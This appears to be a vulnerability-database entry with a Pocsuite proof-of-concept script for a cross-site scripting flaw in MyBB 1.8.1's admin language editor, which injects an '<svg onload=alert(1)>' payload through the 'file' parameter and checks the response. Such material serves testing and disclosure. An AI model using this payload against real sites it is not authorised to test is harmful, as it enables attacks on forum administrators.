MyBB 1.8.1 /admin/modules/config/language.php 跨站脚本漏洞

🗓️ 23 Jan 2015 00:00:00Reported by RootType

MyBB 1.8.1 /admin/modules/config/language.php 跨站脚本漏洞 PO


                                                #!/usr/bin/env python
# coding: utf-8

import re

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

# This poc requires a valid credential(cookie) to the ACP(Admin Control Panel) to work.


class TestPOC(POCBase):
    vulID = '1671'  # vul ID
    version = '1'
    author = ['王畅']
    vulDate = '2014-11-13'
    createDate = '2014-12-10'
    updateDate = '2014-12-10'
    references = ['http://www.exploit-db.com/exploits/35224/']
    name = 'MyBB 1.8.1 /admin/modules/config/language.php 跨站脚本漏洞 POC'
    appPowerLink = 'http://www.mybb.com/'
    appName = 'MyBB'
    appVersion = '1.8.1'
    vulType = 'Cross Site Scripting'
    desc = '''
    MyBB 1.8.1 /admin/modules/config/language.php 因过滤不严导致跨站脚本漏洞
    '''
    # the sample sites for examine
    samples = ['']



    def _verify(self):
        result = {}

        target_url = '/admin/index.php?module=config-languages&action=edit&lang=english&' \
                     'editwith=&file=%3Csvg%20onload=alert(1)%3E'
        
        response = req.get(self.url + target_url, headers=self.headers, timeout=10)
        content = response.content
        match = re.search('<svg onload=alert\(1\)>', content)
        
        if match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url

        return self.parse_attack(result)


    def _attack(self):
        return self._verify()


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)

23 Jan 2015 00:00Current

7.1High risk

Vulners AI Score7.1